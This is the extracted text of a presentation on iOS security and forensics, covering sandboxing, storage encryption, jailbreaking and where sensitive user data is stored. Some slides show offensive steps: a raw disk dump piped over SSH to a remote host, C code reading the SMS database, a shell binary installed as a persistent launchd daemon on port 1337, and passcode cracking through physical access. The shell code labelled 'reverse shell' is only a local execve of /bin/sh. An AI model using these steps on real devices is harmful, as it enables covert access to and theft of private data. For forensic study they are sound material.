Powerpoint Templates Page 1 Powerpoint Templates iOS Security and Forensics

Powerpoint TemplatesPage 1

Powerpoint Templates

iOS Security and

Forensics


Apple’s Security Model

- iDevice applications available on Apple Store

- Tested, analyzed, approved, signed then distributed by Apple services

- Installed in:- /private/var/mobile/Applications/{Unique_App_ID}

- Full list of installed applications :- /private/var/mobile/Library/Caches/com.apple.mobile.installation.plist

- Executed under “mobile” user in TrustedBSD sandbox

- ASLR and DEP activated- All that, on a fully encrypted filesystem.


Apple’s Directories Sandboxing


TrustedBSD Sandbox

- Open source project for FreeBSD systems- Sponsored by Apple, Google, Yahoo!,

NSA…- Modified and used by Apple for OS X and

iOS- Installs series of hooks, in order to

intercept and filter syscalls.- Policy retrieved from a human readable file

then passed to the kernel in a binary format.

- Finally the kernel installs sanbox rules for the process


Policy rules

- Stored in /usr/share/sandbox and hardcoded in the Kernel- Some policies configuration are done by the user through popups- Written in ESDL schema, human readable:

(version 1)(allow default)(deny file-read-data (regex #”^/private/tmp/test\.c$”))

- $ sandbox_exec –p ‘{$POLICY}’ /bin/sh- $ file /private/tmp/test.ctest.c: cannot open: Operation not permitted

- $ sandbox_exec –n no-internet /bin/sh- $ ping 4.2.2.2ping: sendto: Operation not permitted

- The sandbox_init() syscall uses the libsandbox.dylib to convert the policy into binary format.


iDevice Storage Device

NAND storage device exploited like the following:- BOOT (block 0): contains the bootloader- PLOG (block 1) : contains the EMF, BAG1 and Dkey

- EMF : used to encrypt the entire filesystem and HFS journal- BAG1 : used to encrypt the keybag- Dkey : used to encrypt files without encryption policy class

- NVM (block 2-7) : stores the NVRAM parameters- FIRM (block 8-15) : stores the firmware, iBoot, device tree & logos- FSYS (block 16-4084): stores the encrypted filesystem- RSRV (last 15 blocks): reserved


Encryption mechanism

Starting from iPhone 3GS, Apples devices contain hardware encryption processor. It permit the following: - UID keys stored in the processor - 0x835 & 0x89B keys derived from the UID key- Filesystem :

- Data partition encrypted with EMF (AES-128)- System partition encrypted with hardcoded AES-256 key (in kernel & bootloaders)

- Keychain encryption with the Dkey

- The Keybag contains Master Keys for Protection Classes- Some Master Keys encrypted with passcode

- Each file on the filesystem encrypted with a “cprotect” key- Each “cprotect” key is encrypted with the file’s associated Protection Class Master Key

At boot, the EMF and Dkey are extracted automatically


Protection Classes

Files decryption is defined according to their associated “Protection Classes”.

Protection Classes used for files:- NSFileProtectionComplete: file only decrypted when the iDevice is unlocked.- NSFileProtectionCompleteUnlessOpen: file only decrypted when the iDevice is unlocked. It stay decrypted even after lock if the application maintains it open.- NSFileProtectionCompleteUntilUserAuthentication: file decrypted after a successful unlock. It remains decrypted until next reboot.- NSFileProtectionNone: file decrypted using the Dkey.- NSFileProtectionRecovery: undocumented.

Protection Classes used for keychains:- kSecAttrAccessibleWhenUnlocked[ThisDeviceOnly]- kSecAttrAccessibleAfterFirstUnlock[ThisDeviceOnly]- kSecAttrAccessibleAlways[ThisDeviceOnly]


Data wiping and recovery

- Filesystem’s wiping consists of rewriting the EMF & Dkey

- Files deletion consists of rewriting the associated cprotect

- The filesystem’s journal:- encrypted with the Dkey- contains cprotect keys in cleartext- rotation depending on filesystem’s activity- could be retrieved and used to recover deleted files

- /dev/disk0s1s2 raw data backup:- Connect the iDevice to power supply- Disable the autolock- Run:

$ dd if=/dev/rdisk0 bs=4k | ssh -C username@computer_ip 'dd of=/home/{$USER}/dump.dmg'

- Wait… for… a… while….


Security chain


Jailbreak- Execution of third party applications/code allowed- Unsigned code execution granting (depending on jailbreaks)- Complete bypass of the sandbox- Root (/) partition mounted in read/write.

- Before jailbreak:- $ cat /etc/fstab

/dev/disk0s1 / hfs r 0 1

/dev/disk2s1 /private/var hfs rw 0 2- After jailbreak:- $ cat /etc/fstab

/dev/disk0s1 / hfs rw 0 1

/dev/disk2s1 /private/var hfs rw 0 2

Note: on iOS >=5, /dev/disk2s1 became /dev/disk1s2


Useful information- launchd: first executed binary while booting (init like)- watchdog: checks if a process is running in memory more than 5mn, if yes it reboots the iDevice- launchctl : used to control daemons

- $ launchctl load com.adel.reverse_shell.plist

- ldid: Link Identity Editor, used to sign a binary- $ ldid –S my_binary- usbmux: protocol created to encapsulate TCP over USB connections. Optimized and used by iTune.- XCode: developpment platform on Mac OS X, freely downloadable on Apple Store- Cydia Store: online non official applications store for jailbroken devices- SSH binaries: freely available package over Cydia store.


HelloWorld for iDevice- Simple HelloWorld\n program:

- $ cat helloworld.c#include <stdio.h>int main(int argc, char *argv[]){

printf(“HelloWorld\n”);return 0;

}

- $ export PF=/Developer/Platforms/iPhoneOS.platform- $ $PF/Developer/usr/boin/arm-apple-darwin10-llvm-gcc-4.2 -o hello hello.c -isysroot $PF/Developer/SDKs/iPhoneOS5.0.sdk/

- Binary auto-siging:-$ ldid –S hello

- Simple binary file transfer over SSH:- $ scp hello root@<iDevice_IP_Addr>:/usr/bin/my_binary


Local File Disclosure

-$ cat lfi_smsdb.c

#include <stdio.h>

main(){ FILE *fp=NULL; int c=0; fp=fopen("/var/mobile/Library/SMS/sms.db","r"); do { c=fgetc(fp); printf("%c",c); } while (!feof(fp)); fclose(fp); return 0;}


Reverse Shell

-$ cat reverse_shell.c

#include <stdio.h>#include <unistd.h>

main(){

execve("/bin/sh", NULL, NULL);return 0;

}


Process Daemonizing

- Copying reverse_shell to the iDevice /usr/bin

- Copying com.adel.reverse_shell.plist to the iDevice /System/Library/LaunchDaemons/

- Rebooting the iDevice or :- $ cd /System/Library/LaunchDaemons- $ launchctl load ./com.adel.reverse_shell.plist


plist Manifest Format

- XML file format, used for configuration purpose

- $ cd /System/Library/LaunchDaemons- $ cat com.adel.reverse_shell.plist<?xml version="1.0" encoding="UTF-8"?><plist version="1.0">...<key>Label</key><string>com.adel.reverse_shell</string> <key>Program</key> <string>/usr/bin/reverse_shell</string><key>Sockets</key> <dict> <key>Listeners</key> <dict> <key>SockServiceName</key> <string>1337</string> </dict> </dict>...</plist>


Physical Access Pwnage

Many possibilities:

-Easy: the iDevice does not have passcode- Full access to data over SpringBoard, SSH or after boot on ramdisk

- Medium: the iDevice has a passcode < 4 digits- Booting on ramdisk, patching the kernel and cracking the passcode- Needs max 30mn of passcode cracking (10^4 possibilities)

- Medium ++: the iDevice has a passcode > 5 digits- Could take time for cracking- The xkcd 5$ wrench shall be used !

- Hard: the iDevice has a boot passcode (EMF + Dkey encrypted with that)- ? Does it exist ?


LiveCD vs RAMDISK

- A 2mb HFS+ container with:- customized launchd- binaries to copy/execute- plist files

- Loaded into the iDevice over USB and after reboot to DFU mode- exploit the iDevice vulnerability- load the ramdisk on RAM- execute launchd

- disable watchdog- option 1:

- scan and mount the filesystem (EMF + Dkey auto-extracted)- copy files on the filesystem- chroot on the mounted filesystem- option 2:- initialize the usbmux protocol- read and send raw NAND data over USB (EMF + Dkey must be extracted manually


Sensitive Data

- Keyboard cache- Clipboard buffer- Consolidated GPS positions databse and latest GPS position- Applications and Safari snapshot cache- Google maps cache and history- Address book, photos, songs, voice records, notes, calendar, call history- SMS, MMS, drafts and SpotLight SMS cache- Geolocalization tags on photos- Safari cache, search list, bookmarks, cookies, history and WebKit cache- Installed applications list- Emails, applications, their data and cache- Lastest dialed number, bookmarked contact list, IMSI, ICCID- Configured access point list…


Keyboard Cache

Contains the keyboard cache- Written known and unknown words- One cache per language- Available in /private/var/mobile/Library/Keyboard/


Keyboard Cache


Applications snapshot

Available in:$ /private/var/mobile/Library/Caches/Snapshots/{APP_NAME}/{NAME}.jpg


Consolidated GPS Positions Databse

Available in:$ /private/var/root/Library/Caches/locationd/consolidated.db








End.

Questions ?

Documents

Powerpoint Templates Page 1 Powerpoint Templates iOS Security and Forensics